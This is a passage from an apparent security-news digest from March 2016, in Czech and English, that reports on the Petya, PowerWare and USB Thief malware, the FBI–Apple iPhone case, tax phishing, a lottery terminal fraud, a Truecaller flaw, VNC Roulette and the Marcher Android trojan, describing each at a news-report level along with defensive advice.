Zvláštní vlastností tohoto softwaru je právě v tom, že šifruje jen MBR, což může provést v podstatě okamžitě (MBR není zrovna obrovská struktura). Ransomware Petya vynutí kritickou chybu operačního systému a přinutí jej restartovat. Protože se MBR zašifruje, operační systém nemůže nabootovat a objeví se hláška vyžadující výkupné. Útočníci požadují necelý bitcoin, což je v dnešní době zhruba 10 tisíc korun. Ostatní ransomware metody kvůli šifrování celého disku mohou být zpozorovány, neboť tento proces zabere dlouhou dobu, je výpočetně náročný a je možné násilně vypnout počítač dříve, než zašifruje celý disk. Petya se šíří přes e-mail ohledně pracovních nabídek vybízející ke stažení přílohy uložené na Dropboxu. Zatím se tak děje zejména v Německu.


FBI nakonec hackla iPhone útočníka, pomoc Applu už nepotřebuje

29.3.2016 Ochrany Zdroj: Lupa.cz

Podivuhodný soudní spor má podivuhodný konec. Tedy – aspoň v tomto kole. Řada otázek ale pořád zůstává nezodpovězených.
„Úřadům se podařilo úspěšně proniknout k datům uloženým ve Farookově iPhonu, a proto už nevyžadují spolupráci od firmy Apple Inc., nařízenou soudním příkazem z 16. února.“ Čerstvé prohlášení amerického ministerstva spravedlnosti (PDF) potvrzuje, že se FBI nakonec podařilo proniknout ochranami Applu i bez jeho pomoci.

Úřady tak požádaly soud o zrušení příkazu. Několik měsíců se táhnoucí soudní spor, ve kterém Apple odmítl FBI pomoci a vytvořit speciální verzi systému iOS, která by pomohla obejít ochranu iPhonu, tak končí.

Tip: Mnoho povyku pro PIN. O co vlastně jde v boji mezi FBI a Applem

Ministerstvo zatím nezveřejnilo žádné podrobnosti o tom, jakým konkrétním způsobem se nakonec k datům dostalo. Připustilo jen, že s metodou přišel někdo mimo FBI – „třetí strana“. Izraelský deník Yedioth Ahronoth minulý týden napsal, že by mohlo jít o tamní firmu Cellebrite. Úřady i firma ale informaci odmítly komentovat.

Není tak jasné, jestli se dá metoda použít jen na inkriminovaném iPhonu útočníka ze San Bernardina, nebo jestli se s její pomocí dá proniknout i do jiných modelů. Farook ovšem měl starší model 5c, který neobsahuje novější bezpečnostní prvky jako je speciální kryptografický čip Secure Enclava (ten přišel s procesorem A7, který je např. v modelu 5s). Na přístroji běží iOS 9.

Úspěch FBI může znamenat, že neznámá třetí strana zná nějakou chybu v zabezpečení iPhonů, o které Apple neví. A to není pro Apple ani jeho uživatele dobrá zpráva. Firma by proto teď mohla po vládě chtít, aby jí dotyčnou chybu prozradila – ovšem je otázka, jestli by byla úspěšná.

Tip: Apple chystá lepší ochranu iPhonů, aby se do nich úřady nedostaly

Podle agentury Bloomberg by se mohla předání informací dožadovat v rámci procesu tzv. „equities review“, podle kterého americké úřady rozhodují, zda výrobcům hardwaru a softwaru prozradí chyby, na které přijdou. Pravidla mají své výjimky, které úřadům umožňují zjištěné chyby zatajit, pokud splní určité podmínky.

Nahlásit případnou chybu a umožnit ji Applu opravit by přitom FBI mohlo zkomplikovat život. Farookův mobil není jediným, do kterého se vyšetřovatelé chtějí dostat. A v současné době vedou řadu dalších soudních sporů, ve kterých od Applu požadují pomoc s odemčením iPhonů.


FBI odblokovala teroristův iPhone i bez pomoci Applu

29.3.2016 Ochrany
Američtí vyšetřovatelé se dokázali dostat k obsahu telefonu iPhone používaným jedním z pachatelů prosincového útoku v kalifornském San Bernardinu i bez pomoci společnosti Apple, která tento telefon vyrábí. Ministerstvo spravedlnosti vzápětí odvolalo svou žalobu na společnost, kterou se domáhalo, aby Apple pomohl s odblokováním telefonu. Vyplývá to z dokumentů, které ministerstvo poslalo k soudu. Spor byl ostře sledovaný, protože mohl mít širší důsledky pro ochranu osobních údajů.
Ministerstvo požadovalo od Apple, aby Federálnímu úřadu pro vyšetřování (FBI) poskytl program, které umožní odblokovat telefon iPhone 5C, který vlastnil Syed Farook. Ten spolu s manželkou v San Bernardinu postříleli 14 lidí a dalších 22 zranili. Následně v přestřelce s policií zahynuli.

FBI zkoumá možnou komunikaci Farooka a jeho manželky Tashfeen Malikové s teroristickou organizací Islámský stát. Inkriminovaný telefon by prý mohl obsahovat důkazy.

Vláda "se úspěšně dostala k údajům ve Farookově iPhonu, a tak už není pomoc Apple potřebná", praví se v dokumentech zaslaných k soudu.

Společnost Apple se k novému vývoji v případu zatím nevyjádřila. Dříve varovala před vytvářením "zadních vrátek" k obsahu mobilů, zneužitelných zločinci a vládami.

Apple pomoc odmítal
Dříve ministerstvo požádalo o odročení soudního jednání, protože se úřady chystaly vyzkoušet novou metodu, od níž si slibovaly průnik k obsahu telefonu i bez pomoci výrobce. Ministerstvo si nicméně ponechalo prostor pro případnou soudní bitvu s výrobcem. Úřady v této při podporovali pozůstalí po obětech útoku v San Bernardinu.

Apple požadavky úřadů odmítal, protože by mohly vytvořit nebezpečný precedent, ospravedlňující v budoucnu další požadavky úřadů na přístup k osobním údajům dalších občanů z nejrůznějších důvodů. V tomto sporu se za Apple postavili bezpečnostní experti, ochránci práva na soukromí a další přední technologické firmy jako Google, Facebook či Microsoft.

Pomohli Izraelci?
Jak uvedl server BBC, firmou, která FBI s dekódováním pomohla, je pravděpodobně společnost Cellebrite se sídlem v Izraeli. Firma britské stanici potvrdila, že s americkými vyšetřovateli spolupracuje, ale více nesdělila.

Na svých internetových stránkách nicméně Cellebrite prohlašuje, že jeden z jejich nástrojů umí dekódovat a extrahovat data z iPhonu 5C.


USB Thief, the new USB-based data stealing Trojan
29.3.2016 Virus

USB Thief, the new USB-based data-stealing Trojan discovered by ESET that relies on USB devices in order to spread itself and infect also air-gapped systems
Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself.

USB Thief is able to infect air-gapped or isolated systems does not leave any trace of activity on the infected systems.

Malware authors have implemented special techniques mechanisms to protect USB Thief from being detected and analyzed. The authors also implemented an advanced multi-staged encryption process to protect the Trojan.

“The USB Thief is, in many aspects different from the more common malware types that we’re used to seeing flooding the internet,” wrote Tomáš Gardoň, a malware analyst at ESET.

“This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze.

Badusb

The USB Thief Trojan malware can be stored either as a Dynamically Linked Library (DLL) used by the portable applications or as a portable application’s plugin source.

Mobile devices are usually used to store portable version of common applications like Firefox, TrueCrypt, and Notepad++. When victims launch the portable application the USB Thief runs in the background.

“Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on.” continues the post.

The malware completely resides on the USB device, it doesn’t leave any trace of its presence. According to the experts at the ESET any tool that could be used to breach an air-gapped network must be taken into account.

“Well, taking into account that organizations isolate some of their systems for a good reason,” said Peter Stancik, the security evangelist at ESET. “Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous.” “People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy.”

How can organizations prevent attacks based on USB Thief from succeeding?
Do not use USB storage devices from sources that may not be trustworthy.
Disable USB ports wherever possible.
Define strict policies to enforce care in the use of USB devices.
Train the staff on cyber threats.


1 million Gmail accounts victim of state-sponsored hacking

28.3.2016 Incindent

Google is improving its Gmail warning service to help protect the customers from state-sponsored hacking and surveillance activities.
Google confirmed that one million Gmail accounts might have been targeted by nation-state hackers.

The news is worrying, the company is observing a significant increase in the number of hacking attacks on user email accounts.

Google announced that it is able to identify operations carried out by state-sponsored hackers and it is its intention to notify potentially affected customers.

Google hasn’t provided details on the number of affected customers, anyway , it confirmed that the list of victims “often” includes “activists, journalists, and policy-makers taking bold stands around the world.”

Google confirmed that only a limited number of customers are targeted by state-sponsored hackers, roughly less than 0.1% of users ever receive a notification from the company that anyway consider critic to inform users on ongoing attacks.

In the past, users received a warning through a pink Warning tab present on top of Gmail urging victims to adopt necessary countermeasures.

Google state-sponsored hacking notifications

Now Google has improved the notification messages using a full-page warning related to state-sponsored hacking.

“Today, we’re launching a new, full-page warning with instructions about how these users can stay safe. They may see these new warnings instead of, or in addition to, the existing ones.”

Google state-sponsored hacking notifications 2

Google is improving its “safe browsing” security notifications, a mechanism to inform users when they are going to open suspicious links included in receiving emails. The users will receive a full-page notice before opening the link, meanwhile, in the past the same notification was provided before a link was clicked.

“Safe Browsing already protects Gmail users by identifying potentially dangerous links in messages. Starting this week, Gmail users will begin to see warnings if they click these links, further extending this protection to different web browsers and email apps. ” States the security advisory published by Google.

Google is continuing to push email encryption to protect its customers from government surveillance. Google is working with IT Giants, including Comcast, Microsoft, and Yahoo, to propose a new secure email mechanism.

In the last weeks, Google implemented a mechanism to warn Gmail users when they send and receive email over unsecured connections.

“This has had an immediate, positive effect on Gmail security. In the 44 days since we introduced it, the amount of inbound mail sent over an encrypted connection increased by 25%. We’re very encouraged by this progress! ” states Google.

“Given the relative ease of implementing encryption and its significant benefits for users, we expect to see this progress continue.”


Watch out, IRS Tax Fraud activities on the rise

28.3.2016 Safety

Security experts and government agencies confirm that IRS Tax Fraud And Phishing campaigns are increasing thanks to new techniques and tools.
Internal Revenue Service tax fraud has reached a peak in the last year, crooks are intensifying their activity adopting new techniques to monetize their efforts.

According to security experts that are monitoring the phenomena, Tax-related phishing activities are increasing in this period.

This is a critical period in the US, the so-called Tax season, that will end on April 18th. In February, an IRS bulletin confirmed that there is a 400 percent surge in tax-related phishing and malware incidents.

“Tax-related phishing is something of an annual phenomenon, but Proofpoint researchers are seeing a degree of sophistication and pervasiveness that sets this year apart,” states a report published by the Proofpoint firm that analyzes tax fraud trends.

Crooks are trying to exploit new habits of taxpayers, for exampletheit preference for mobile platforms. Security experts observed a mobile-optimized phishing site that appears as a legitimate tax application and that targets mobile users.Proofpoint confirmed to have discovered a number of phishing sites hosted on major providers which were shut down by the ISPs after their discovery.Tax-related frauds are considering an emergency for law enforcement, hundreds of thousands of users are potentially at risk.

Recently, IRS services were abused by cyber criminals to target taxpayers, in May 2015 the Internal Revenue Service suffered a data breach. Hackers “used an online service provided by the agency” to access data for more than 100,000 taxpayers. The IRS issued an official statement on the incident and specified that the compromised system was “Get Transcript.” The Transcript service could be used by taxpayers to get a transcript online or by mail to view their tax account transactions.

In August 2015, the Internal Revenue Service disclosed a new review of its system, revealing that 334,000 taxpayers (more than three times it initially estimated) may be affected by the hack it announced in May.

In February the IRS detected roughly unauthorized attempts using 464,000 unique SSNs, and 101,000 attempts allowed crooks in generating PINs.

The U.S. Internal Revenue Service confirmed that cyber criminals abused the Electronic Filing PIN application running on irs.gov that allows taxpayers to generate a PIN that they can use to file tax returns online.

Last figures available on the ‘Get Transcript’ hack revealed that 700,000 taxpayers were affected by the data breach, the government experts observed 47 million tax transcripts requested under false pretenses, a worrying phenomenon.

This year, security firms and government agencies are observing some new worrying attacks targeting businesses with W-2 phishing campaigns. W-2 information could be used by fraudsters to file victim’s taxes and request refunds in their name.

The crooks are also trying to monetize tax-related voice-phishing in order to obtain information to use in the fraudulent activities.

The experts are observing an increased interest in criminal ecosystem for stolen information that could be exploited in tax refund fraud. This precious commodity is becoming popular also in the principal black markets in the dark web.

Attackers are using this information to abuse of the IRS’ electronic filing PIN verification system and file a fake return under on the victim’s behalf and requesting the payment through a fraudulent bank account. The FBI confirmed a significant increase of the Stolen Identity Refund Fraud (SIRF), victims of this kind of crimes are specific categories of individuals like homeless and prisoners.

“SIRF is relatively easy to commit and extremely lucrative for criminal actors. While all U.S. taxpayers are susceptible to SIRF, over the past year, criminal actors have targeted specific portions of the population, including: temporary visa holders, the homeless, prisoners, the deceased, low-income individuals, children, senior citizens, and military personnel deployed overseas.” states the FBI.

Another worrying trend observed by ProofPoint is the availability of tax phishing kits that have reached a high level of quality.

These kits are available for sale in the principal black market places and implements a number of features that allows crooks to avoid detection.

“Sophisticated phishing kits custom-made for tax season dramatically boost threat actors across the spectrum to go after the taxpayers. Whether optimized for mobile (in the case of the fake tax preparation software) or “hiding in plain sight,” these kits are powerful tools for cyber criminals. We even observed a kit correctly using SSL, leveraging the secure form-delivery capabilities of the particular service provider they used. Correctly signed certificates make the phishing sites harder to detect for end users, web browsers, and security providers, giving attackers a leg up during tax season—even with commodity kits.” states ProofPoint.

IRS tax fraud phishing kit

Taxpayers have to be careful, cyber criminals will do every thing to steal their money.


6 Charged for Hacking Lottery Terminals to Produce More Winning Tickets
28.3.2016 Hacking

Police have arrested and charged six people with crimes linked to hacking Connecticut state lottery terminals in order to produce more winning tickets than usual.
Prosecutors say all the six suspects are either owners or employees of retail stores that produced a much higher number of winning tickets than the state average, according to the Hartford Courant.
Suspects Hacked Lottery Terminal
The alleged group set up machines to process a flood of tickets at once that caused a temporary display freeze, allowing operators to see which of the tickets about to be dispensed would be winning tickets, cancel the duff ones, and print the good ones.
The hack appears to have exploited some software weaknesses in lottery terminals that not only caused ticket requests to be delayed but also allowed operators to know ahead of time whether a given request would produce a winning ticket.
The actual culprit, in this case, was a game dubbed "5 Card Cash."
The alleged suspects manipulated automated ticket dispensers to run off 5 Card Cash game that consists of tickets a user can buy, on which playing cards are printed.
If 5 cards form a winning poker hand, then the buyer can cash the tickets based on the hand they received.
Authorities Suspended 5 Card .Cash Lottery Game
Authorities had already suspended the 5 Card Cash lottery game in Connecticut past November after discovering that the game was generating more winning tickets than its winning range parameters should have technically permitted.
The six suspects are:
Vikas Patel, 32, from Windsor
Pranav Patel, 32, from Bloomfield
Sedat Kurutan from Naugatuck
Moinuddin Saiyed from Norwalk
Prakuni Patel from Wallingford
Rahul Gandhi from Wallingford
Pranav Patel and Vikas Patel were arrested on Friday, March 19 while the rests took into custody between February 29 and March 7.
The charges filed against Vikas and Pranav include first-degree felony counts of larceny and computer crime as well as felony rigging a game charges. Both of them have been bailed on $25,000 bonds each and are scheduled to appear in court on Monday.
Investigators for the Department of Consumer Protection and the Connecticut Lottery say that many clerks were abusing lottery tickets to fetch out more winning tickets that they would later cash in for themselves, and that more arrests may be made in the future.


PowerWare ransomware, a new fileless threat in the wild
28.3.2016 Virus

Experts at Carbon Black spotted in the wild a new threat dubbed PowerWare ransomware that exploits PowerShell, the native Windows framework.
Authors of ransomware are implementing new features to make their malware even more dangerous and effective. Yesterday I wrote about the new Petya ransomware, which overwrites MBR causing a blue screen of death, now I will introduce you a threat targeting the healthcare industry.

The new ransomware is called PowerWare and was discovered a week ago by security researchers at the Carbon Black firm.

Powerware ransomware

The most interesting feature implemented in the PowerWare ransomware is that it is fileless. Many malware in the wild are fileless, including one of the variants of the popular Angler Exploit Kit, but this feature is rare for ransomware.

Criminal gangs behind PowerWare are spreading it using spam messages including a Word document attachment purporting to be an invoice. The attackers use an old trick in order to convince victims in enabling the macros, they request to enable macros to correctly view the document.

The macros runs the cmd.exe which launches the PowerShell, the native Windows framework that uses a command-line shell to perform several tasks.

The use of PowerShell allows the ransomware to avoid writing files to the disk and make hard the threat detection. It also allows the ransomware to encrypt files on the victim’s PC.

“The macros are there to launch PowerShell and pull down the ransomware script. Lots of malware can be distributed via macros in Word docs. Most of the time they download additional binaries to do more bad stuff (backdoors, etc.),” Valdez said.

“This does not pull down any additional binaries (executables), and leverages PowerShell (already on the system and approved to be there) to do the dirty work.”

“This means no ‘traditional’ malware – no additional executable needed – just a text document (script).”

The PowerShell ransomware requests victims to pay a $500 ransom to restored the encrypted files. Also in this case, the ransom double if the victim’s doesn’t respect the deadline.

Fileless ransomware could become rapidly popular in the criminal ecosystem, on March 11, the researchers at Palo Alto Networks, spotted a new malware family called PowerSniff that has many similarities with PowerWare, including the fileless capability.


Nuclear Plants in Germany Are Vulnerable to Terrorism Threats
28.3.2016 Vulnerebility

According to a recent report, Germany nuclear plants are vulnerable to terrorists and there needs to be some serious dealing with this problem.
According to a recently released report, Germany is not adequately equipped to prevent terrorist attacks in its nuclear plants.

According to the Deutsche Presse-Agentur (DPA) news agency, the report was presented by Oda Becker, an independent expert on nuclear plants.

This is of course extremely distressing, especially in the light of the recent tragic events in Belgium with substantial casualties. The report was brought to public attention

The report was brought to public attention at the German Federation for the Environment and Nature Conservation (BUND) Congress, where concerns were expressed towards protecting citizens from catastrophic consequences of another terrorist attack.

When an aircraft is about to collide, there is little that can be done from the defensive line of the nuclear plants to prevent the inevitable.

The same level of threat is expressed through the option of helicopters filled with explosives. There is nothing to prevent such acts, causing a massive destruction and severe radiation flowing everywhere.

Terrorism is one of the major threats to the industry of nuclear plants, making these facilities one of the most prestigious targets to focus on.

“A serious accident is possible in case of every German nuclear plant,” Becker explained in a separate study published on March 8 and titled “Nuclear power 2016 – secure, clean, everything under control?”

Becker considers insufficient security standards, natural disasters, terrorist attacks and emergencies caused by the deterioration of the German nuclear plants’ security systems as major threats to the industry.

“there are no appropriate accident management plans.” she added Becker. “The interim [nuclear waste] storages lack protection against aircraft crashes and dangers posed by terrorists,” Becker said,

germany nuclear plants vulnerable terrorism

The media in Belgium concentrate on the initial thoughts of the terrorists to hit the nuclear plants. If it weren’t for the arrest in Paris, these thoughts would have been made reality and the casualties would have been even greater. Dernier Heure, a newspaper from Belgium, revealed that the terrorists had planted a camera in front of the house of the director of the Belgian nuclear research program. In this way, they had gained a lot of information.

All these events have made a lot of people skeptical as to the importance of shutting down nuclear plants. The head of BUND, Hubert Weiger, has said:

“It is even more necessary than ever to abandon this technology,” and this thought reflects the opinions of thousands in Germany, Belgium and Europe altogether.

AP has reported that IS (or ISIS) has been training hundreds of people especially for external attacks and this would be a threat beyond any control. About 450 people are specials in creating bombs, deteriorating the situation for Europe.

If people in Germany and Belgium do not take immediate actions, who knows what can happen next?


Podnikoví špióni útočí: Mohou to být uklízečka nebo poslíček s poštou

28.3.2016 Špionáž
Je mnohem snadnější proniknout do společnosti jako zaměstnanec nižší úrovně, například jako správce domu či pracovník podatelny, kde jsou nároky mnohem menší – a špión přitom stejně dostává příslovečné klíče ke království.

Někteří informační špióni procházejí náborem zaměstnanců, aby se dostali do firmy a ukradli podniková tajemství pro konkurenci nebo cizí stát. Jiní se zase obrátí proti svému zaměstnavateli, když se rozzlobí a odcházejí nebo když je zlákají jiné pracovní nabídky. Jde takové insidery včas odhalit?

Podniky se snaží vnitřní zrádce odhalit – omezit jejich přístup k citlivým údajům ale nemusí stačit. Se správnou pracovní pozicí a přístupem mohou agenti fiktivně vystupující jako uklízeči, zaměstnanci podatelny nebo IT personál obejít ochrany dat pomocí svého rozsáhlého přístupu a cenný intelektuální majetek vynést pryč.

Co mohou manažeři bezpečnosti udělat technicky i jinak k ochraně bezpečnosti cenných dat před slídily?

Vstup

Podnikoví špióni přicházející z jiných organizací zpravidla dobře splňují podmínky pro příslušné pracovní místo, ale jejich úmysly zůstávají skryté. Úplně zabránit riziku, že by někdo pracoval pro konkurenci, může být obtížné až nemožné, možná dokonce i nežádoucí, protože existuje zájem zaměstnávat personál se zkušenostmi od konkurence.

„Zaměstnanci konkurence mají schopnosti, tržní inteligenci a zkušenosti, které podnik potřebuje, takže jsou to vlastně kandidáti první volby,“ tvrdí Sol Cates, šéf zabezpečení ve společnosti Vormetric.

Konkurenti také podplácejí dříve loajální zaměstnance, aby jejich prostřednictvím získávali vaše data a přetahují je na svou stranu, aby tak získali tržní výhody.

Mnoho podniků se snaží dělat jednoduché kontroly pracovní minulosti a referencí, ale nevěnují se dostatečně odhalování případných postranních úmyslů.

„Dokonce i někteří smluvní partneři státních organizací, kteří běžně pracují s utajovanými informacemi, se spoléhají výhradně na kontrolu minulosti prostřednictvím bezpečnostní prověrky a nedělají další kontroly,“ tvrdí Philip Becnel, ředitel společnosti Dinolt, Becnel, & Wells Investigative Group.

Tato úroveň šetření ale nestačí, protože podnikoví špióni, kteří jsou loajální ke své zemi či původnímu zaměstnavateli, ne k tomu současnému, budou sdílet utajovaná data s dalšími subjekty.

Podniky mohou udělat právní kontroly minulosti uchazeče, aby ověřily, zda předchozí zaměstnavatel například nežaloval kandidáta kvůli krádeži podnikových dat a duševního vlastnictví.

„To však pomůže jen v případě, že se uchazeč už dříve dopustil podnikové špionáže a bývalý zaměstnavatel ho při ní chytil,“ vysvětluje Cates.

Jakmile podnik přijme kandidáta, měl by použít technologie řízení přístupu na fyzické i IT úrovni, skartování dokumentů a zavést dohled, který by odhalil podnikové špióny a zabezpečil se vůči nim. V této oblasti stále existuje řada nedostatků.

Pronikání k podnikovým pokladům

Agenti podnikové špionáže projdou skulinami mezi typickými součástmi většiny kontrol minulosti. Podnik zkontroluje historii zaměstnání, výpis z rejstříku trestů a záznamy o dopravních přestupcích.

To všechno se však týká toho, co kandidát už kdysi udělal, ale ne toho, co chce udělat teď. „Není to jako test na detektoru lži nebo jiná metrika, kterou by společnost mohla použít při kontrole osob kandidujících na citlivá vládní pracovní místa,“ popisuje Cates.

Pachatelé podnikové špionáže se mohou dostat blízko k datům i přes nejméně sledovaná, ale pro špionáž stále výhodná pracovní místa. „Je mnohem snadnější proniknout do společnosti jako zaměstnanec nižší úrovně, například jako správce domu či pracovník podatelny, kde jsou nároky mnohem menší a špión stále dostává příslovečné klíče ke království,“ vysvětluje Becnel.

Naverbovat někoho již pracujícího v cílové společnosti je ještě snadnější, než protlačit špióna přes proces přijímání nových pracovníků. „Pro podnik je také velmi těžké chytit někoho, kdo už je uvnitř a má už určitou důvěru,“ tvrdí Becnel.

„Je časté, že konkurenti kontaktují nespokojené zaměstnance, nabídnou jim práci za lepší plat a požádají je, aby s sebou při odchodu vzali všechna citlivá data,“ tvrdí Becnel. Ti mohou přistupovat k elektronickým datům nebo jen nahrávat pomocí chytrého telefonu interní schůzky a telefonní hovory.

Při náboru existujících zaměstnanců je často největší výhrou IT profesionál, jenž má plný přístup ke všem datům a kterého společnost nesleduje. „Některé z největších špionážních akcí vykonal personál IT,“ tvrdí Cates.

Nepustit dovnitř…

Hluboké a důkladné kontroly pracovní minulosti jsou dobrým začátkem v zabezpečení firem vůči nežádoucímu přijetí agenta, který pracuje pro konkurenci nebo cizí stát, a to i v případě nižších pracovních pozic.


Remotely Exploitable Flaw in Truecaller Leaves 100 Million Android Devices Vulnerable

27.3.2016 Vulnerebility

Security researchers from the Cheetah Mobile Security Research Lab discovered a severe flaw in the call management application Truecaller.
Recently, security researchers from the Cheetah Mobile Security Research Lab discovered a severe loophole in the popular phone call management application Truecaller.

This vulnerability allows anyone to steal Truecaller users’ sensitive information, potentially opening doors for attackers. Overall, more than 100 Million Android users who have downloaded this app on their smartphones are in danger.

The researcher found that Truecaller uses the devices’ IMEI as the only identity label of its users. Meaning that anyone gaining the IMEI of a device will be able to get Truecaller users’ personal information (including phone number, home address, mail box, gender, etc.) and tamper app settings without users’ consent, exposing them to malicious phishers.

Truecaller 2

By exploiting this flaw, the attackers can:

Steal personal information like account name, gender, e-mail, profile pic, home address, etc.
Modify a user’s application settings:
Disable spam blockers
Add to a black list for users
Delete a user’s blacklist
The Cheetah Mobile Security Research Team notified the developer of Truecaller about this vulnerability as soon as they discovered the loophole and offered all it could to help the developer fix the issue. Now the maker of Truecaller has addressed the issue and released an update on March 22nd.

Although the flaw has been fixed in the latest version, the majority of the users are still in danger as they have not got access to the new release yet. The CM Security Research Lab advises Truecaller users to upgrade this app to the latest version as soon as possible.

Written by Cheetah Mobile Security Research Lab


PETYA ransomware overwrites MBR causing a blue screen of death
27.3.2016 Virus

The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR and leaves a ransom note at system startup.
Ransomware is one of the most dangerous threats of this first part of the year, recently experts at TrendMicro has spotted a new malicious code dubbed Petya (RANSOM_PETYA.A) that overwrites MBR to lock users out of the infected machines.

The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR and leaves a ransom note at system startup.

Petya overwrites the MBR of the hard drive causing Windows to crash. When the victim tries to reboot the PC, it will impossible to load the OS, even in Safe Mode.

Users turning on the computer are displayed a flashing red and white screen with a skull-and-crossbones instead.

petya ransomware

“As if encrypting files and holding them hostage is not enough, cybercriminals who create and spread crypto-ransomware are now resorting to causing blue screen of death (BSoD) and putting their ransom notes at system startup—as in, even before the operating system loads.” states the post published by Trend Micro.

“Imagine turning on your computer and instead of the usual Windows icon loading, you get a flashing red and white screen with a skull-and-crossbones instead.”

Another interesting aspect of the Petya is the delivery mechanism used by crooks that relies on legitimate cloud storage services like Dropbox.

“this is the first time (in a long time) that leads to crypto-ransomware infection. It is also a departure from the typical infection chain, wherein the malicious files are attached to emails or hosted in malicious sites and delivered by exploit kits.” continues the post.

Victims would receive an email that appears to be from an applicant seeking a position in a company, it includes a link to a Dropbox folder that contains its alleged CV.

The experts explained that one of the samples they analyzed, the Dropbox folder was containing contains two files, a self-extracting executable file that purports to be the CV, and a photo of the applicant.

The researcher discovered that the photo is a stock image.

The self-extracting executable is used to serve a Trojan onto the victim’s machine, the malware first disable any antivirus programs installed, then downloads and executes the Petya Ransomware.

In the following image are reported the instructions provided by the Petya ransomware to the victims in order to pay the ransom and restore the encrypted files.

The instruction includes a link to the Tor Project and how to download the Tor Browser to visit a page where purchase the decryption key to restore the data.

petya ransomware 2

The crooks behind the Petya ransomware request the payment of 0.99 Bitcoins (nearly US$430), but the price would be doubled if the payment is not completed within a deadline.


VNC Roulette, a web roulette for random easy to hack PCs
27.3.2016 Hacking

The VNC Roulette service is exposing on the Internet thousands of computer systems using insecure and easy to hack VNC connections.
CCTV surveillance cameras, medical equipment, electricity generators, desktops, home alarm equipment and many other systems are not properly protected and open on the Internet.

Now a website named VNC Roulette is offering a ransom access to these computer systems through the VNC software.

VNC is a very popular application that allows remote access and control of desktops over the networks. A lot of people simply use it to remotely access their computer placed elsewhere. Crucially, though, these connections should be secured with passwords and encryption.

The problem is that many VNC connections are not secured with passwords and encryption, allowing the access of criminals and hackers.

The newborn VNC Roulette website is taking screenshots insecure VNC connections, it has already gathered imaged from about 550 systems open on the Internet. It is disconcerting to see people’s privacy violated is no simple way, VNC Roulette reveals users browsing Facebook, accessing personal email accounts, or accessing a SCADA system.

The snaps were taken since 2015, some of them were taken this month and are still up and running.

After the media have covered VNC Roulette, it went off line, but yesterday the service reappeared online.

Below some samples shared online by El Reg.

An X-ray machine in in Nevada, US:

vnc roulette xray
A store’s CCTV system in China:

vnc roulette 2

VNC Roulette demonstrates the importance to properly secure any connection to a system exposed over the Internet. It is very easy for hackers to gain access to systems like the ones captured by the VNC Roulette services.
Don’t waste time, implement a proper authentication to your systems, use strong passwords, only accept connections from certain IP addresses and of course tunnel VNC connections with SSH.

Don’t forget also that crooks have many other ways to locate vulnerable machine over the internet, like the search engines Shodan and Censys.


Nebezpečný trojský kůň číhá na lechtivých webech. Chce ukrást úspory

27.3.2016 Viry
Chytré telefony a počítačové tablety se těší rok od roku větší popularitě, řada uživatelů je používá nejen k přístupu na internet, ale také ke sledování filmů a dalších videí. A právě toho se snaží zneužít počítačoví piráti, kteří za aktualizaci populárního přehrávače Flash Player maskují trojského koně.
Trojský kůň Marcher dokáže majitele chytrých telefonů a počítačových tabletů připravit o peníze. (Ilustrační foto)
Nezvaný návštěvník se jmenuje Marcher a zpravidla se ukrývá na webech s erotickým obsahem. Útok přitom probíhá prakticky vždy stejně. Ve chvíli, kdy se uživatel pokusí spustit video, je vyzván k aktualizaci Flash Playeru, místo ní si přitom do svého přístroje stáhne trojského koně.

Právě na pornostránkách se ukrývá Marcher nejčastěji. Stejným způsobem ale může být šířen také prostřednictvím webů pro sledování virálních videí a pro šíření nelegálních kopií nejrůznějších filmů a seriálů.

Odkazy na falešné weby jsou přitom často šířeny prostřednictvím nevyžádaných e-mailů, stejně tak ale mohou přijít na smartphone pomocí SMS zprávy.

Cílí na Android
Bezpečnostní experti ze společnosti Zscaler doposud zachytili tohoto trojského koně na zařízeních s operačním systémem Android. Není ale vyloučeno, že se bude vyskytovat také na počítačových tabletech a chytrých telefonech postavených na jiných platformách.

Uživatelé si přitom ani nevšimnou, že bylo jejich zařízení infikované, protože trojský kůň vlastně na první pohled nic nedělá a jen vyčkává na svou příležitost. Pokud se uživatel bude prostřednictvím oficiální aplikace Google Play snažit stáhnout nějakou aplikaci, vyskočí mu falešné okno se žádostí o vložení platební karty.

Problém je v tom, že Macher se takto dokáže navázat i na skutečně legitimní aplikace, které žádný škodlivý kód neobsahují. Stačí mu k tomu, aby vytvořil podvodnou stránku s žádostí o vložení údajů platební karty. Když to uživatelé udělají, dají tím podvodníkům přímou vstupenku ke svému bankovnímu účtu.

Obejde i potvrzovací SMS zprávy
Není bez zajímavosti, že tento zákeřný trojský kůň dokáže uživatele sám vyzvat k tomu, aby nějakou aplikaci nainstaloval. Odkaz na stažení může přijít například formou MMS zprávy, tu přitom vytvoří sám Macher. Doporučení na instalaci může být směřováno opět na legitimní program, nezvaný návštěvník se opět snaží pouze vylákat bezpečnostní údaje ke kartě.

Pokud se Macher uhnízdí v chytrém telefonu, dokáže odchytávat i potvrzovací SMS zprávy, které mohou být požadovány při některých on-line transakcích.

První verze trojského koně Macher byla odhalena už v roce 2013. Od té doby jej ale počítačoví piráti neustále vylepšovali až do aktuální podoby, která terorizuje uživatele chytrých telefonů a počítačových tabletů s operačním systémem Android.


Malware USB Thief, nezanechá stopy a nepotřebuje internet

27.3.2016 Viry
Malware USB Thief, nezanechá stopy a nepotřebuje internetVčera, Milan Šurkala, aktualitaSpolečnost ESET objevila nový malware, který dokáže krást data a přitom se nešíří internetem. Je totiž instalován na USB flash disku a pro počítač je v podstatě nezjistitelný. Využívá portable verzí různých aplikací.
